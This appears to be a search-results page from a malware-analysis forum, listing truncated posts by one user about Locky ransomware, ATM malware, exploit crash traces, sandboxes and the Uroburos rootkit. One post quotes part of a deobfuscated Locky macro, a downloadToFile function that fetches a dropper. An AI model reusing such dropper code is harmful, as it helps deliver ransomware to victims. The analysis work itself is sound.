A forum for reverse engineering, OS internals and malware analysis 

Search found 73 matches

 Go to advanced search

Re: ATM Malware JackPot v2

 by frank_boldewin ¦  Tue Jul 24, 2018 9:48 am ¦  Forum: Malware ¦  Topic: ATM Malware JackPot v2 ¦  Replies: 7 ¦  Views: 5346

Does the sample work for you?
On my machines it always crashes.

Re: Locky ransomware

 by frank_boldewin ¦  Wed May 11, 2016 7:39 pm ¦  Forum: Malware ¦  Topic: Locky ransomware ¦  Replies: 142 ¦  Views: 203693

Just analysed a new way Locky tries to install on systems. Very small zip-files (<1000 Bytes), after unzipping there's a rar-file and inside this one a .vbe (encrypted .vbs file). The vbs file tries to download and run a locky dropper. Several AV-Scanners suck to detect this. Encrypted .vbe file '**...

Re: Locky ransomware

 by frank_boldewin ¦  Wed Feb 24, 2016 2:14 pm ¦  Forum: Malware ¦  Topic: Locky ransomware ¦  Replies: 142 ¦  Views: 203693

Just in case one is interested. attached is an unpacked version of locky.

Re: Locky ransomware

 by frank_boldewin ¦  Tue Feb 23, 2016 4:23 pm ¦  Forum: Malware ¦  Topic: Locky ransomware ¦  Replies: 142 ¦  Views: 203693

Seems like it stopped working. Servers taken down? maddog4012's doc file starts a macro with some ofuscated vb-code and decodes to following code: function downloadToFile(url,file) { var xhr=new ActiveXObject("msxml2.xmlhttp"); ado=new ActiveXObject("ADODB.Stream"); xhr.open("GET",url,false); xhr.s...

Re: [2015-08-04]ARK for Windows x64: WIN64AST(Page8#78)

 by frank_boldewin ¦  Fri Aug 07, 2015 10:14 am ¦  Forum: Tools/Software ¦  Topic: [2017-11-05]ARK for Windows X64: WIN64AST(Page10#96) ¦  Replies: 99 ¦  Views: 351053

i like your tool, though some features are hardly missing.

complete process + driver dump inkl. pe-fixing
memory map (VAD) view for processes including page protections as well as dumping individual pages.

Re: CVE-2015-0311

 by frank_boldewin ¦  Mon Jan 26, 2015 8:13 am ¦  Forum: Malware ¦  Topic: CVE-2015-0311 ¦  Replies: 15 ¦  Views: 13249

Does one of these samples trigger something on your site?

Re: Automated Malware Environments

 by frank_boldewin ¦  Sat Dec 13, 2014 4:42 pm ¦  Forum: Malware ¦  Topic: Automated Malware Environments ¦  Replies: 12 ¦  Views: 9872

Cuckoo supports VBOX, VMWARE and QEMU KVM. Further it has support for Volatility. The latet Version has a branch to a new API-Monitor, which will integrate in the master branch in the near future. Another plugin is zer0m0n from conix-security which supports kernel hooks and some antivm stuff. And ye...

Re: JD-GUI (Free Java Decompiler)

 by frank_boldewin ¦  Sat May 10, 2014 11:37 am ¦  Forum: Tools/Software ¦  Topic: JD-GUI (Free Java Decompiler) ¦  Replies: 6 ¦  Views: 10561

Re: CVE-2014-1761

 by frank_boldewin ¦  Fri Apr 04, 2014 1:44 pm ¦  Forum: Malware ¦  Topic: CVE-2014-1761 ¦  Replies: 11 ¦  Views: 7297

Sample tested on Windows 7 en - Office 2007 SP3 ---> crash from the stack rewind we can see it triggered the bug and jumped to the first ROP call at 0x275a48e8 (RET at 0x275a48f6) and that a function in wwlib.dll seems to be the source of the bug. 0:000> kb ChildEBP RetAddr Args to Child WARNING: Fr...

Re: Uroburos rootkit

 by frank_boldewin ¦  Mon Mar 03, 2014 5:29 pm ¦  Forum: Malware ¦  Topic: WinNT/Turla (WinNT/Pfinet, Uroburos rootkit) ¦  Replies: 66 ¦  Views: 256666

Yesterday i wrote on facebook that the Uroboros malware reminds me on a similar case back in 2008. Now i'm pretty sure. When the dropper executes first it checks if it runs on a 32bit or 64bit system to select what driver to drop later. It creates a directory $NtUninstallQ817473 inside the windows d...

  • 1
  • 2
  • 3
  • 4
  • 5
  • 8